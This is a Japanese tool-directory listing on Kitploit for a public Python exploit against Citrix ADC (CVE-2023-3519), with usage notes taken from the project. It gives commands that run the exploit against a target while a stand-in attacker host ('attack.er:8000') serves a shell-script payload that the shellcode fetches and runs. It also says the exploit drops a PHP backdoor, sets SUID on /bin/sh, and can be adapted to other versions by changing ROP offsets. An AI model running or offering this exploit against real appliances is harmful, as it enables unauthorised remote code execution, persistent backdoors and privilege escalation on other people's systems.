Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-3519 — CVE-2023-3519を標的としたCitrix ADC向けのPythonエクスプロイト。カスタムNASMシェルコード、PHPバックドアの展開、SUID権限昇格を備えています。 | Kitploit
ツール/GitHubGitHub/passwa11/cve-2023-3519
脆弱性分析エクスプロイトシェルコードウェブアプリケーション悪用リモートアクセスツールペイロード開発
GitHubpasswa11/cve-2023-3519

CVE-2023-3519

CVE-2023-3519を標的としたCitrix ADC向けのPythonエクスプロイト。カスタムNASMシェルコード、PHPバックドアの展開、SUID権限昇格を備えています。

リポジトリを見る
1123年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Citrix ADC RCE CVE-2023-3519

このエクスプロイトは、Citrix VPX 13.1-48.47向けのアドレスとシェルコードを使用しています。完全な解説は、こちらをクリックしてください。

使用法

シェルコードをビルドするにはNASMが必要です。

root@kitploit:~
$ sudo apt install nasm

含まれているシェルコードは、リモートのhttp(s)サーバーからシェルスクリプトをダウンロードして実行します。スクリプトは3つの引数を受け取ります: ターゲットホスト、ターゲットポート、シェルスクリプトペイロードのURLです。idとuname -aを実行してから後処理を行うペイロードの例がこのリポジトリに含まれています。

root@kitploit:~
$ echo 'id' > a
$ python3 -m http.server &
$ python3 cve-2023-3519.py victim.com 443 attack.er:8000/a

URLはシェルコードバッファに収まるように十分短くなければならず、長すぎると警告が表示されます。

シェルコードのアーティファクト

シェルコードは、/var/netscaler/logon/a.phpにPHPバックドアを作成し、/bin/shにSUIDビットを設定します。含まれているshペイロードは、これらのアーティファクトを自動的にクリーンアップする例を示しています。また、シェルコードはファイル記述子を閉じないため、過度の繰り返しエクスプロイトはリソース枯渇を引き起こす可能性があります。

他のバージョンへの適応

FreeBSDベースのCitrixターゲットの場合、見つける必要があるのは3つの値だけです: 保存されたリターンポインタのオフセット、jmp rsp ROPガジェット(またはpush rsp; ret;などの同等のもの)、そしてクラッシュを回避するためにジャンプするアドレスです。これらのパラメータはすべてcve-2023-3519.pyの上部近くにハードコードされています。

ツールをダウンロード